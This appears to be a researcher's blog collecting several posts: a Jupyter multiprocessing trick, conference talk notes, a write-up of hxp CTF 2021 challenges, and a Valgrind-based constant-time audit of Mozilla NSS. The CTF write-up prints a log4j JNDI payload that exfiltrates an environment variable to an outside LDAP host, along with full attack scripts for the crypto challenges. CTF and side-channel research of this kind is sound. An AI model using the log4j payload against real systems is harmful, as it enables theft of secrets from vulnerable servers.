Jupyter notebooks and multiprocessing - How to spawn and fork(server)

Today I came up with a clever solution for a dumb problem. When using multiprocessing or concurrent.futures in a Jupyter notebook one is generally limited to the fork start method. This is because the spawn and the forkserver methods require that the target function is defined in an importable module. If you are working with Jupyter notebooks the target function very likely resides in the notebook itself, which is not importable. So, how do we make it importable?

Easy, we just get its source code, write it into a temporary file, add its directory to sys.path, and import it dynamically! The code below does all of that inside of a contextmanager.

import inspect
import tempfile
import sys

from contextlib import contextmanager
from importlib import import_module, invalidate_caches
from pathlib import Path


@contextmanager
def enable_spawn(func):
    invalidate_caches()
    source = inspect.getsource(func)
    with tempfile.NamedTemporaryFile(suffix=".py", mode="w") as f:
        f.write(source)
        f.flush()
        path = Path(f.name)
        directory = str(path.parent)
        sys.path.append(directory)
        module = import_module(str(path.stem))
        yield getattr(module, func.__name__)
        sys.path.remove(directory)

Now for a demo of how it actually works. The main limitation is that only the body of the target function is written to the file, meaning that all of its imports have to be contained in it.

from concurrent.futures import ProcessPoolExecutor, as_completed
import multiprocessing

def target_func(arg):
    from math import sqrt
    return arg, sqrt(arg)

context = multiprocessing.get_context("spawn")
with ProcessPoolExecutor(max_workers=10, mp_context=context) as pool, enable_spawn(target_func) as target:
    futures = [pool.submit(target, i) for i in range(20)]
    for future in as_completed(futures):
        print(future.result())
(0, 0.0)
(1, 1.0)
(2, 1.4142135623730951)
(3, 1.7320508075688772)
(4, 2.0)
(5, 2.23606797749979)
(6, 2.449489742783178)
(7, 2.6457513110645907)
(8, 2.8284271247461903)
(9, 3.0)
(10, 3.1622776601683795)
(11, 3.3166247903554)
(12, 3.4641016151377544)
(14, 3.7416573867739413)
(15, 3.872983346207417)
(16, 4.0)
(17, 4.123105625617661)
(18, 4.242640687119285)
(19, 4.358898943540674)

Doing this might not (always) be a good idea, as the other start methods have their own properties, so ymmv.


Real World Crypto 2022 & IEEE SP 2022

I recently presented the paper “They’re not that hard to mitigate”: What Cryptographic Library Developers Think About Timing Attacks on Real World Crypto 2022 and IEEE Security & Privacy 2022. If you want to get more info on the paper including a pre-print and additional material, check out its page. The RWC slides are available as well as the IEEE S&P slides.

Furthermore, the level of interest in the talk and the tools for analysis of constant-time cryptographic code motivated me to start a Github page collecting these tools at crocs-muni.github.io/ct-tools/. I hope that in the future this page can have tutorials and guides on using these tools crowdsourced from the community.

When I was in San Francisco for IEEE S&P I abused my jetlag and went for a very early walk around SF. I also took some photos.

Thanks a lot for the following photos from RWC 2022 to Benoit Viguier!


hxp ctf 2021

hxp ctf 2021 This year, we at the Crocs-Side-Scripting CTF team took part in the hxp CTF 2021 . It was another challenging CTF with hard challenges. This post contains our solutions to the four challenges we solved (Log 4 sanity check#, gipfel#, kipferl# and infinity# as well as a note on the solution to zipfel#. We came in at a respectable 34th place, which was an improvement from last years position. Hoping for top 20 next year!

Log 4 sanity check#

msc, 104 points

We were discussing with the team just before the CTF this year whether there will be a challenge exploiting the recent log4j library vulnerabilities. When we saw it we were quite amused. Anyway, the solution to the challenge was quite simple. The flag was stored in an environment variable, which hinted at using the log4j exploit that does not achieve RCE but only environment variable exfiltration via a LDAP (or DNS, …) request. The payload was just the log4j exploit string pointing at this server targeting the flag, however we needed to actually have something to detect the queried LDAP path containing the flag.

${jndi:ldap://neuromancer.sk/${env:FLAG}}

Simply listening on the LDAP port showed some communication from the vulnerable server, but the requested path is not sent in the first request and without a proper LDAP server response the vulnerable service would not send it. We quickly whipped up the first LDAP server that we found slapd and after a bit of bumbling around with its configuration to have it run and log, but after checking the syslog, there it was!

Dec 17 16:43:31 Finn slapd[476096]: conn=1001 op=1 do_search: invalid dn: "hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}"

This challenge could have also been solved without the LDAP server, see here for example.

gipfel#

cry, 85 points

The first crypto challenge of this year was rather simple, a weird Diffie-Hellman type thing where not only the private key is private, but also the generator, which is randomly generated from a password every three runs.

def enc(a):
    f = {str: str.encode, int: int.__str__}.get(type(a))
    return enc(f(a)) if f else a

def H(*args):
    data = b'\0'.join(map(enc, args))
    return SHA256.new(data).digest()

def F(h, x):
    return pow(h, x, q)

password = random.randrange(10**6)

def go():
    g = int(H(password).hex(), 16)

    privA = 40*random.randrange(2**999)
    pubA = F(g, privA)
    print(f'{pubA = :#x}')

    pubB = int(input(),0)
    if not 1 < pubB < q:
        exit('nope')

    shared = F(pubB, privA)

    verA = F(g, shared**3)
    print(f'{verA = :#x}')

    verB = int(input(),0)
    if verB == F(g, shared**5):
        key = H(password, shared)
        flag = open('flag.txt').read().strip()
        aes = AES.new(key, AES.MODE_CTR, nonce=b'')
        print(f'flag:', aes.encrypt(flag.encode()).hex())
    else:
        print(f'nope! {shared:#x}')

signal.alarm(2021)
go()
go()
go()

I think we have solved this challenge quite differently than other teams. We realized that after one run of the protocol in which the \(verB\) check fails the server shares the used \(shared\) value which together with \(verA\) allows for constructing an offline oracle for testing guesses of the generator \(g\) and thus also the password. The oracle is based on the equation: \[ verA = g^{shared^3} \mod q\] which we can check for all password guesses once we have \(verA\) and \(shared\) from one go() run.

#!/usr/bin/env python3
# Requires pwntools, tqdm, pycryptodome
from pwn import *
from tqdm import tqdm
from Crypto.Hash import SHA256
from Crypto.Cipher import AES
from binascii import unhexlify

q = 0x3a05ce0b044dade60c9a52fb6a3035fc9117b307ca21ae1b6577fef7acd651c1f1c9c06a644fd82955694af6cd4e88f540010f2e8fdf037c769135dbe29bf16a154b62e614bb441f318a82ccd1e493ffa565e5ffd5a708251a50d145f3159a5

def enc(a):
    f = {str: str.encode, int: int.__str__}.get(type(a))
    return enc(f(a)) if f else a

def H(*args):
    data = b'\0'.join(map(enc, args))
    return SHA256.new(data).digest()

def F(h, x):
    return pow(h, x, q)

def solve_pow(server):
    pow_regex = re.compile(r"\"([0-9a-f]+)\"")
    bits_regex = re.compile("([0-9]+) zero")

    pow_line = server.recvline()
    pow_challenge = pow_regex.search(pow_line.decode()).groups()[0]
    pow_bits = bits_regex.search(pow_line.decode()).groups()[0]

    pow_proc = subprocess.run(["./pow-solver", pow_bits, pow_challenge], capture_output=True)
    pow_res = pow_proc.stdout.strip()

    server.sendline(pow_res)

def decrypt(password, shared, data):
    key = H(password, shared)
    aes = AES.new(key, AES.MODE_CTR, nonce=b'')
    return aes.decrypt(unhexlify(data))

if __name__ == "__main__":
    log.info("Precomputing gs")
    g_options = {}
    for pw in tqdm(range(10**6)):
        h = int(H(pw).hex(), 16)
        g_options[pw] = h

    server = remote("65.108.176.66", 1088)
    log.info("Solving PoW")
    solve_pow(server)
    log.success("Solved PoW")

    pubA = int(server.recvline().strip().decode().split(" = ")[1], 16)

    server.sendline(b"2")

    verA = int(server.recvline().strip().decode().split(" = ")[1], 16)

    server.sendline(b"2") # This will fail and we will get shared.

    shared = int(server.recvline().strip().decode().split("! ")[1], 16)
    exp = shared**3 % (q-1)

    for password, g in tqdm(g_options.items()):
        if verA == F(g, exp):
            break
    log.success(f"We got the g: {g}")
    log.success(f"We got the password: {password}")

    log.info("--- Second run ---")

    pubA = int(server.recvline().strip().decode().split(" = ")[1], 16)

    privB = 10
    pubB = F(g, privB)
    server.sendline(str(pubB).encode())

    verA = int(server.recvline().strip().decode().split(" = ")[1], 16)

    shared = F(pubA, privB)
    assert verA == F(g, shared**3)
    verB = F(g, shared**5)
    server.sendline(str(verB).encode())

    encrypted_flag = server.recvline().strip().decode().split(": ")[1]
    log.success(f"The flag is {decrypt(password, shared, encrypted_flag)}")

    server.close()

The code above gets the flag in the time limit, as it incorporates a simple speedup to reduce the \(shared^3\) exponent modulo \(q-1\).

kipferl#

cry, 227 points

The kipferl challenge was very similar to gipfel with the only difference being that the finite field Diffie-Hellman was replaced with elliptic curve Diffie-Hellman over a weird curve over the same prime. We managed to solve it as the third fastest team, mainly due to our gipfel solution being different and more generic than the usual one. As our gipfel solution only used the group structure and the values \(verA\) and \(shared\), we could very quickly adapt it to also work on kipferl. There were a few twists though:

  • The generator \(G\) could now lie on the original curve or on its twist. This made the simple speedup of gipfel above slightly more tricky, as we needed to test where the generator guess is to reduce by the correct order.
  • The scalar multiplication operations as implemented in the challenge are quite slow, and we needed to run quite a lot of them in the time limit of 2021 seconds.

To address these issues, we precomputed the possible generators for all passwords together with information on whether they lied on the original curve or twist curve and used parallelization for the rest. The script below precomputes generator information in Sagemath.

# Requires tqdm and pycryptodome
import json
from tqdm import tqdm
from Crypto.Hash import SHA256

q = 0x3a05ce0b044dade60c9a52fb6a3035fc9117b307ca21ae1b6577fef7acd651c1f1c9c06a644fd82955694af6cd4e88f540010f2e8fdf037c769135dbe29bf16a154b62e614bb441f318a82ccd1e493ffa565e5ffd5a708251a50d145f3159a5
K = GF(q)
a, b = K(1), K(0)

curve = EllipticCurve([a, b])

def enc(a):
    f = {str: str.encode, int: int.__str__}.get(type(a))
    return enc(f(a)) if f else a

def H(*args):
    data = b'\0'.join(map(enc, args))
    return SHA256.new(data).digest()

if __name__ == "__main__":
    print("Precomputing gs...")
    gs = {}
    for pw in tqdm(range(10**6)):
        g = int(H(pw).hex(), 16)
        try:
            curve.lift_x(K(g))
            mod = "orig"
        except:
            mod = "twist"
        gs[pw] = {
            "g": g,
            "mod": mod
        }

    with open("gs.json", "w") as f:
        json.dump(gs, f)

Next the actual attack script in Python. We actually reduce by a square root \(r\) of the order of the original curve as its group structure is bi-cyclic (\(\mathbb{Z}_r \times \mathbb{Z}_r\)). With enough cores the script below gets the flag.

#!/usr/bin/env python3
from pwn import *
from Crypto.Hash import SHA256
from Crypto.Cipher import AES
from binascii import unhexlify
from multiprocessing import Pool
from tqdm import tqdm
import json

q = 0x3a05ce0b044dade60c9a52fb6a3035fc9117b307ca21ae1b6577fef7acd651c1f1c9c06a644fd82955694af6cd4e88f540010f2e8fdf037c769135dbe29bf16a154b62e614bb441f318a82ccd1e493ffa565e5ffd5a708251a50d145f3159a5
a, b = 1, 0
order_orig = 21992493417575896428286087521674334179336251497851906051131955410904158485314789427947788692030188502157019527331790513011401920585195969087140918256569620608732530453375717414098148438918130733211117668960801178110820764957628836
order_sqrt = 4689615487177589107664782585032558388794418913529425573939737788208931564987743250881967962324438559511711351322406
order_twist = 2 * q + 2 - order_orig

################################################################

# https://www.hyperelliptic.org/EFD/g1p/data/shortw/xz/ladder/ladd-2002-it
def xDBLADD(P,Q,PQ):
    (X1,Z1), (X2,Z2), (X3,Z3) = PQ, P, Q
    X4 = (X2**2-a*Z2**2)**2-8*b*X2*Z2**3
    Z4 = 4*(X2*Z2*(X2**2+a*Z2**2)+b*Z2**4)
    X5 = Z1*((X2*X3-a*Z2*Z3)**2-4*b*Z2*Z3*(X2*Z3+X3*Z2))
    Z5 = X1*(X2*Z3-X3*Z2)**2
    X4,Z4,X5,Z5 = (c%q for c in (X4,Z4,X5,Z5))
    return (X4,Z4), (X5,Z5)

def xMUL(P, k):
    Q,R = (1,0), P
    for i in reversed(range(k.bit_length()+1)):
        if k >> i & 1: R,Q = Q,R
        Q,R = xDBLADD(Q,R,P)
        if k >> i & 1: R,Q = Q,R
    return Q

################################################################

def enc(a):
    f = {str: str.encode, int: int.__str__}.get(type(a))
    return enc(f(a)) if f else a

def H(*args):
    data = b'\0'.join(map(enc, args))
    return SHA256.new(data).digest()

def F(h, x):
    r = xMUL((h,1), x)
    return r[0] * pow(r[1],-1,q) % q

def test_F(args):
    password, g, verA, exp = args
    out = F(g, exp)
    if verA == out:
        return True, password, g
    else:
        return False, password, g

def solve_pow(server):
    pow_regex = re.compile(r"\"([0-9a-f]+)\"")
    bits_regex = re.compile("([0-9]+) zero")

    pow_line = server.recvline()
    pow_challenge = pow_regex.search(pow_line.decode()).groups()[0]
    pow_bits = bits_regex.search(pow_line.decode()).groups()[0]

    pow_proc = subprocess.run(["./pow-solver", pow_bits, pow_challenge], capture_output=True)
    pow_res = pow_proc.stdout.strip()

    server.sendline(pow_res)

def decrypt(password, shared, data):
    key = H(password, shared)
    aes = AES.new(key, AES.MODE_CTR, nonce=b'')
    return aes.decrypt(unhexlify(data))

if __name__ == "__main__":
    log.info("Loading gs...")
    with open("gs.json") as f:
        gs = json.load(f)

    server = remote("65.108.176.252", 1099)
    log.info("Solving PoW")
    solve_pow(server)
    log.success("Solved PoW")

    pubA = int(server.recvline().strip().decode().split(" = ")[1], 16)

    server.sendline(b"2")

    verA = int(server.recvline().strip().decode().split(" = ")[1], 16)

    server.sendline(b"2") # This will fail and we will get shared.

    shared = int(server.recvline().strip().decode().split("! ")[1], 16)
    exp_orig = shared**3 % order_sqrt
    exp_twist = shared**3 % order_twist

    tasks = [(int(password), val["g"], verA, exp_orig if val["mod"] == "orig" else exp_twist) for password, val in gs.items()]

    pool = Pool()
    res = pool.imap_unordered(test_F, tasks)
    for r in tqdm(res, total=len(gs)):
        if r[0]:
            password = r[1]
            g = r[2]
            pool.terminate()
            pool.join()
            break
    else:
        log.error("No luck")
        exit(1)
    log.success(f"We got the g: {g}")
    log.success(f"We got the password: {password}")

    log.info("---- Second run ----")

    pubA = int(server.recvline().strip().decode().split(" = ")[1], 16)

    privB = 10
    pubB = F(g, privB)

    server.sendline(str(pubB).encode())

    verA = int(server.recvline().strip().decode().split(" = ")[1], 16)

    shared = F(pubA, privB)
    assert verA == F(g, (shared**3))
    verB = F(g, (shared**5))

    server.sendline(str(verB).encode())

    encrypted_flag = server.recvline().strip().decode().split(": ")[1]
    log.success(f"The flag is {decrypt(password, shared, encrypted_flag)}")

    server.close()

infinity#

cry, 500 points

This challenge presents a SageMath implementation of the CSIDH protocol that gives you 600 seconds of interaction in which you can interact upto 500 times but can not send the same public key more than once.

#!/usr/bin/env sage
proof.all(False)

if sys.version_info.major < 3:
    print('nope nope nope nope | https://hxp.io/blog/72')
    exit(-2)

ls = list(prime_range(3,117))
p = 4 * prod(ls) - 1
base = bytes((int(p).bit_length() + 7) // 8)

R.<t> = GF(p)[]

def montgomery_coefficient(E):
    a,b = E.short_weierstrass_model().a_invariants()[-2:]
    r, = (t**3 + a*t + b).roots(multiplicities=False)
    s = sqrt(3*r**2 + a)
    return -3 * (-1)**is_square(s) * r / s

def csidh(pub, priv):
    assert type(pub) == bytes and len(pub) == len(base)
    E = EllipticCurve(GF(p), [0, int.from_bytes(pub,'big'), 0, 1, 0])
    assert (p+1) * E.random_point() == E(0)
    for es in ([max(0,+e) for e in priv], [max(0,-e) for e in priv]):
        while any(es):
            x = GF(p).random_element()
            try: P = E.lift_x(x)
            except ValueError: continue
            k = prod(l for l,e in zip(ls,es) if e)
            P *= (p+1) // k
            for i,(l,e) in enumerate(zip(ls,es)):
                if not e: continue
                k //= l
                phi = E.isogeny(k*P)
                E,P = phi.codomain(), phi(P)
                es[i] -= 1
        E = E.quadratic_twist()
    return int(montgomery_coefficient(E)).to_bytes(len(base),'big')

################################################################

randrange = __import__('random').SystemRandom().randrange
class CSIDH:
    def __init__(self):
        self.priv = [randrange(-2,+3) for _ in ls]
        self.pub = csidh(base, self.priv)
    def public(self): return self.pub
    def shared(self, other): return csidh(other, self.priv)

################################################################

alice = CSIDH()

__import__('signal').alarm(600)

from Crypto.Hash import SHA512
secret = ','.join(f'{e:+}' for e in alice.priv)
stream = SHA512.new(secret.encode()).digest()
flag = open('flag.txt','rb').read().strip()
assert len(flag) <= len(stream)
print('flag:', bytes(x^^y for x,y in zip(flag,stream)).hex())

seen = set()
for _ in range(500):
    bob = bytes.fromhex(input().strip())
    assert bob not in seen; seen.add(bob)
    print(alice.shared(bob).hex())

After some analysis of the CSIDH implementation we noticed that it is faulty. Occasionally (with probability \(1/l_i\)) it will fail to walk an isogeny of degree \(l_i\) during its isogeny walk. The secret exponents in this implementation are constrained to \(\{-2, -1, 0, 1, 2\}\). This means that if the exponent \(e_i\) is zero, the implementation can not fail to walk an \(l_i\)-degree isogeny as there is supposed to be no walk, if \(\lvert e_i \rvert = 1\) there is one chance for it to fail, if \(\lvert e_i \rvert = 2\) there are two chances for it to fail.

We knew that we needed to use these different failure probabilities to get information on the private key which would get us the flag. If we had Alice’s public key or could send the same public key more than once we could detect when an error happened, as we could compare the returned shared secret with the expected one. However, we had no clear way to do that. What we thought of next send us on a twisted and long detour where our solution almost worked but not quite. Get it twist-ed?

Twist diagram

We thought of using twists (shown in the diagram above as \(t\)) to let Alice walk back and forth between two “neighborhoods” of curves, one neighborhood close to the starting curve (can be \(E_0\) or really any curve) and one neighborhood close to her public key. We could then try to find a path between consecutive pairs of curves in each neighborhood using a meet-in-the-middle graph search algorithm. These paths would be the errors that Alice made during her two computations “there” and “back” (on the diagram above the paths are highlighted using colors). We would then aggregate these errors and use their relative frequencies to infer information about Alice’s private key.

CSIDH base curve twist

There were a couple of issues with this approach. First, the \(E_0\) curve is special with regards to twists, as twisting it jumps to the second graph component in the isogeny graph (also we thought that SageMath might have some issues computing a twist of this curve correctly). Thinking back at this, it could actually be beneficial to use this fact if the other graph component is somehow smaller to have an easier time searching the neighborhoods. The other issue with this twisted approach is that you can easily only detect errors upto a sign and you will not detect the case when Alice makes the same error during both computations “there” and “back”. However, even with these issues our approach almost worked and we spent a good part of a day on looking at its partially good results and trying to figure out where exactly it was going wrong. There was clear signal in the noise as we detected when errors happened in our test runs, but after aggregating the errors we were not getting what we expected.

The idea to ditch the twists came on the last day of the CTF. We finally thought of the simpler solution to creating our two neighborhoods of curves by giving Alice the curve \(E_0\), then \([3]E_0\), \([5]E_0\), and so on, obtaining curves \(A_0\), \(A_1\), \(A_2\) then doing \([3^{-1}]A_1\) and so on to map the curves back to the neighborhood. What we got by mapping the curves back were essentially Alice’s public key with errors introduced by the faulty algorithm. We counted the unique curves in this mapped set and given that the probability of no error occuring at all during the computation of the faulty algorithm was quite high we could see that the curve that occured the most often was Alice’s true public key, without any errors. We could then run a meet-in-the-middle algorithm to find paths between this public key and other mapped curves, these paths were the errors that Alice made during the computation. Compared to the twist approach, here we were getting all the errors correctly and even with the sign intact, as we were searching for paths between an error-less public key and a public key with errors (a single run of the faulty algorithm was involved, not two).

We then aggregated the errors (which matched the private key exactly on smaller instance test runs we did) but then no flag . We weren’t sure what had happened and tried to fix errors by hand in coefficients where the frequency of errors was the most “in-between” two expected frequencies given the private key coefficients. This proved tedious, but then we figured out that we have the actual Alice’s public key and we could run one final meet-in-the-middle run with this public key and the public key obtained by our private key guess. This would fix the errors in the private key for us, and indeed it did!

hxp{1s0g3n1es__m0rE_L1k3__1_s0_G3n1u5}

zipfel#

cry, 714 points - did not solve

Although we did not manage to solve zipfel during the CTF, we had a pretty good idea on how to do it and even had a script computing the solution running as the CTF ended. zipfel is a continuation of kipferl in that the code is almost unchanged except the ommision of the \(verA\) value. Without this value our previous attacks no longer work, as even with the \(shared\) value we can’t create our oracle. However, it turned out there was another oracle. We could use the provided \(pubA\) public key and Weil’s pairing to check our guesses of the generator \(G\). We looked at zipfel quite late, only after solving infinity late on the last day and there was simply no time to compute this given the rather slow pairing computation in SageMath on that curve.


Testing constant-timeness using Valgrind: case of the NSS library

Cryptographic code needs to be constant-time to not leak secrets via timing. Being constant-time is usually defined as:

  • No branching on secret-dependent values.
  • No memory access based on secret-dependent values.
  • No secret-dependent values given to some variable time functions.

There are a few ways of testing or verifying that code is constant-time, for example using the tools I described in a previous post. In this post I looked at using Valgrind’s memcheck tool to test constant-timeness of primitives in the NSS cryptographic library.

Testing constant-timeness using Valgrind#

As far as I know, the original idea of using Valgrind’s MemCheck for testing constant-timeness goes to Adam Langley’s ctgrind, introduced in a blog post and on github, back in 2010. Older versions of Valgrind did not expose the necessary interface so a patch was needed, however, no patches are needed for current versions of Valgrind. A modern presentation of the idea is Timecop.

The idea is to use Valgrind MemCheck’s memory definedness tracking as a sort of dynamic data dependency tracker that reports issues when data derived from undefined data is branched upon or is used for memory access.

First you write a test-wrapper for the function you want to test, which in this case is the compute function below. Then in the wrapper you mark all of the secrets as undefined using Valgrind’s client_request feature. The macros VALGRIND_MAKE_MEM_UNDEFINED(addr, len) and VALGRIND_MAKE_MEM_DEFINED(addr, len) are available from <valgrind/memcheck.h>.

#include <valgrind/memcheck.h>

int compute(unsigned char secret[32]) {
    if (secret[0] == 0) {
        return 0;
    } else {
        return 1;
    }
}

int main(void) {
    unsigned char buf[32];
    for (int i = 0; i < 32; ++i)
        buf[i] = 0;
    VALGRIND_MAKE_MEM_UNDEFINED(buf, 32);
    compute(buf);
    return 0;
}

Then when you run valgrind on the produced binary you get:

Conditional jump or move depends on uninitialised value(s)
        at 0x1093BC: compute (code.c:4)
        by 0x109464: main (code.c:16)

Which shows that Valgrind’s MemCheck correctly detected the branching on secret values present in the compute function.

Properties & Limitations#

This method of testing constant-timeness has some limitations. It is a runtime technique so only code that gets executed gets tested. Getting good code coverage is thus important. While Valgrind MemCheck’s checking machinery is complex there is no guarantee that it in itself is correctly implemented or that it does not have false negatives or false positives. This is however the case with all software, and by doing any sort of tool-assisted analysis one has to include the tool in the trusted computing base and assume that it works.

Testing the Mozilla NSS library#

I started this work with the goal of trying out this technique of testing constant-timeness on a real-worls library and also with the goal of upstreaming the changes to the library CI.

Working with NSS created quite a bit of hassle. It uses Mercurial for version control. I have never used Mercurial before and some of its concepts looked completely backwards to my git-familiar brain. Also, setting up and understanding all of the bazillion Mozilla’s services necessary to submit patches to NSS was quite involved.

Integrating annotations#

I decided to focus on testing constant-timeness of the cryptographic primitives in NSS first. Timing attacks often focus on these primitives, but some focus on higher level constructions in TLS (like Lucky13) so larger parts of the TLS stack should be tested. To use Valgrind to test constant-timeness of crypto primitives one needs to write test-cases which execute the primitives on secret inputs marked undefined. Luckily, NSS already has test-cases for many of its primitives in the bltest and fbectest binaries, so I added the Valgrind annotations to those and pushed the revision.

I only annotated private keys and random nonces as secret values. I decided to not annotate inputs to hash functions and messages in encryption functions, even though these are also often meant to be secret (e.g. when hashing a secret to produce a key, or when encrypting a secret message, duh).

Testing constant-timeness#

To actually run the test-cases in CI a test suite was necessary. I decided to copy over the cipher test suite, which runs the bltest binary usualy and create a new test suite ct which does the same but under Valgrind’s memcheck (revision). I also added tests using Valgrind on the fbectest binary which performs ECDH.

Results#

I collected data while running on a machine with AMD Ryzen 7 PRO 4750U, using Valgrind 3.17.0 and gcc 11.1.0 on a Debug build of NSS targeting x86_64 based on revision ea6fb7d0d0fc. The test process reported AES-NI, PCLMUL, SHA, AVX, AVX2, SSSE3, SSE4.1, SSE4.2 all supported.

AES-GCM decryption#

The first report from Valgrind was for AES-GCM decryption:

Conditional jump or move depends on uninitialised value(s)
    at 0x5115E5C: intel_AES_GCM_DecryptUpdate (intel-gcm-wrap.c:319)
    by 0x5087D43: AES_Decrypt (rijndael.c:1206)
    by 0x11D496: AES_Decrypt (loader.c:509)
    by 0x10F46F: aes_Decrypt (blapitest.c:1159)
    by 0x113D4D: cipherDoOp (blapitest.c:2506)
    by 0x1170E1: blapi_selftest (blapitest.c:3358)
    by 0x118C62: main (blapitest.c:3912)

It points at line 319 in the intel_AES_GCM_DecryptUpdate function, if we look at that line we see:

if (NSS_SecureMemcmp(T, intag, tagBytes) != 0) {     // Line 319
    memset(outbuf, 0, inlen);
    *outlen = 0;
    /* force a CKR_ENCRYPTED_DATA_INVALID error at in softoken */
    PORT_SetError(SEC_ERROR_BAD_DATA);
    return SECFailure;
}

which is benign leakage, as what leaks is whether the GCM tag is valid or not. As Valgrind does not report further leaks inside of the secure compare function we can assume that only the result of the function leaks via the branch on line 319. I have to give bonus points to NSS here for clearing the output buffer when an AEAD tag verification fails and not passing the unauthenticated decrypted data to the caller.

DSA signing#

During the DSA_SignDigestWithSeed call in DSA signing, the raw private key data is converted to an mpi via mp_read_unsigned_octets. This seems to leak some amount of information on the private key. This leakage is similar to leakage in 1 and 2, where a non-constant-time base64 decoding operation performed on private key data was targeted. However, as there is no base64 decoding here, transforming raw data into an mpi, I expect the leakage to be rather small. With that said, in DSA even leaking partial information about the random nonce (mainly most or least significant bits) can lead to key recovery via lattice attacks like Minerva 3. I can’t tell whether this function is vulnerable so more analysis is necessary.

Conditional jump or move depends on uninitialised value(s)
    at 0x50753D8: mp_cmp_z (mpi.c:1577)
    by 0x5079552: mp_read_unsigned_octets (mpi.c:4772)
    by 0x5031F07: dsa_SignDigest (dsa.c:384)
    by 0x50326F4: DSA_SignDigestWithSeed (dsa.c:547)
    by 0x11C971: DSA_SignDigestWithSeed (loader.c:184)
    by 0x10FA27: dsa_signDigest (blapitest.c:1326)
    by 0x114799: cipherDoOp (blapitest.c:2602)
    by 0x116F09: blapi_selftest (blapitest.c:3321)
    by 0x118C62: main (blapitest.c:3912)

Then Valgrind proceeds to report leakage all over the DSA signing process, in various mp_mul and mp_mulmod calls mostly, like the report below:

Conditional jump or move depends on uninitialised value(s)
    at 0x507712D: s_mp_clamp (mpi.c:2929)
    by 0x50740C8: mp_mul (mpi.c:888)
    by 0x5032288: dsa_SignDigest (dsa.c:439)
    by 0x50326F4: DSA_SignDigestWithSeed (dsa.c:547)
    by 0x11C971: DSA_SignDigestWithSeed (loader.c:184)
    by 0x10FA27: dsa_signDigest (blapitest.c:1326)
    by 0x114799: cipherDoOp (blapitest.c:2602)
    by 0x116F09: blapi_selftest (blapitest.c:3321)
    by 0x118C62: main (blapitest.c:3912)

However, the DSA signing code uses a blinding side-channel countermeasure in which the nonce \(k\) is blinded and used as \(t = k + q f\) where \(f\) is a random int with its most-significant bit set and \(q\) is the order of the generator \(g\). This blinding is done for the modular exponentiation \(g^t \mod q = g^k \mod q\). For later steps, namely the modular inversion of the nonce \(k\) and work with the private key, further blinding is done with random values from \(\mathbb{Z}_q\). This blinding seems to be enough to stop the leakage of the nonce or the private key, but more detailed analysis would be required to be sure.

RSA decryption, RSA-OAEP decryption and RSA-PSS signing#

All of the RSA, RSA-OAEP decryption and RSA-PSS signature algorithms use the same underlying rsa_PrivateKeyOpCRTNoCheck function, so they can be described together.

Similarly to DSA signing, the function first loads the contents of the raw RSA-CRT private key into an mpi: \[p,\; q,\; d\pmod{p - 1},\; d\pmod{q - 1},\; q^{-1}\pmod{p}\] Here, the leakage might be more serious than in the DSA case, as more secret values are loaded and reconstructing the RSA private key given some information on those values might be possible (see for example 4, 5 or 6).

Furthermore, the code then proceeds to directly give the private values to several mp_mod and mp_exptmod calls which Valgrind flags as leaking. I expect the mp_exptmod function to leak a lot of information about the exponent as it is just a general purpose modular exponentiation function and not RSA specific one created with constant-timeness in mind.

ECDH key derivation#

The ECDH_Derive function uses the same logic to read the raw private key into an mpi as do DSA and RSA. This leaks some amount of information but like in the DSA case I expect it to be very small and practically unusable.

P-256#

The next reported group of issues concerns the NIST P-256 implementation in NSS. ECDH on this curve is implemented using the ec_GFp_nistp256_points_mul_vartime function. Now this may be a red flag , but it is a benign one. Luckily, the variable time function is a two-scalar multiplication function which short-circuits to the constant-time ec_GFp_nistp256_point_mul if only one scalar input is provided, which is the case for ECDH. Why does Valgrind report issues then? Well, it only reports issues inside the from_montgomery which is supposed to transform the resulting point coordinates back from Montgomery form after the scalar multiplication. It is hard to classify hw serious this leakage is. It reminds me of a few papers (7 and 8) which exploited similar side-channel leakage of the projective representation of a result of scalar multiplication to extract partial information about the scalar used. However, that was done for ECDSA, where partial information about the scalar can lead to key recovery. For ECDH, this leakage might reveal some bits of the scalar. Perhaps in case of static ECDH an attacker could adaptively query the scalar multiplication while measuring this leaking conversion and mount something like the Raccoon attack (9)?

The final report by Valgrind for P-256 is about the ec_point_at_infinity function, which is used to test whether the derived point in ECDH is not the point at infinity and if it is, to abort the operation. I think this is benign leakage as it is leaked anyway when the operation fails.

P-284 and P-521#

NSS’s implementation of the P-384 and P-521 curves is from ECCKiila which itself uses fiat-crypto. Its use in ECDH still has the reading of the private key leak and the final comparison to point at infinity but doesn’t have the from_montgomery leaks, because of a different scalar multiplication implementation.

Curve25519#

Valgrind only reports one issue in the Curve25519 case and that is a branching on a comparision of the output point to the point at infinity, which is again benign.

ECDSA signing#

During this implementation work I stumbled upon some broken tests of ECDSA in the bltest binary and reported them here.

The ECDSA signing code in NSS is very similar to DSA signing and Valgrind reports roughly the same issues. The ECDSA code is also using blinding but only on the modular arithmetic level, the random nonce is not blinded when it is used in the scalar multiplier. Due to the broken nature of the tests I couldn’t really look at how different curves are handled in ECDSA but a cursory run saw no leakage from the from_montgomery function as in ECDH on P-256.

As in DSA, the random nonce is also read into an mpi in ECDSA using the mp_read_unsigned_octets function and Valgrind reports some leakage present. Similarly to the DSA case, this leakage might be an issue because it presents information on the random nonce which can lead to vulnerability to lattice attacks.

Conclusions#

Doing this analysis was harder but also more insightful than I expected. Here are some of my observations:

  • Getting this testing of constant-timeness to work, even with a simple tool like Valgrind, on a library as a new contributor is definitely harder than I thought. Maybe this is just NSS, but I expect other popular open-source crypto libraries to be similar.
  • Testing constant-timeness of cryptographic code does not end with running Valgrind on annotated test-cases or even after including constant-timeness test runs in CI. The results presented by Valgrind require actual human eyes to look at them and evaluate whether the leaks are serious/benign. Even I am unsure of some of the leaks presented and I have experience with timing attacks and the related cryptosystems. The noise from benign leaks presented in Valgrind output needs to be solved somehow before these patches can land and run in CI, otherwise these failing tests can mask the introduction of actual exploitable leaks. Valgrind offers a way to silent MemCheck warnings from given codepaths which could be used to achieve this.
  • I believe that some of the presented leaks should be fixed, namely the RSA ones seem to be quite serious.

Just to add, this work was done and this post written before the post of Google Project Zero’s Tavis Ormandy on an unrelated vulnerability in NSS. I certainly don’t want this post to sound like I’m criticizing the folks behind NSS and want this post to help them instead.


  1. Florian Sieck, Sebastian Berndt, Jan Wichelmann, Thomas Eisenbarth: Util::Lookup: Exploiting Key Decoding in Cryptographic Libraries 

  2. Daniel Moghimi, Moritz Lipp, Berk Sunar, Michael Schwarz: Medusa: Microarchitectural Data Leakage via Automated Attack Synthesis 

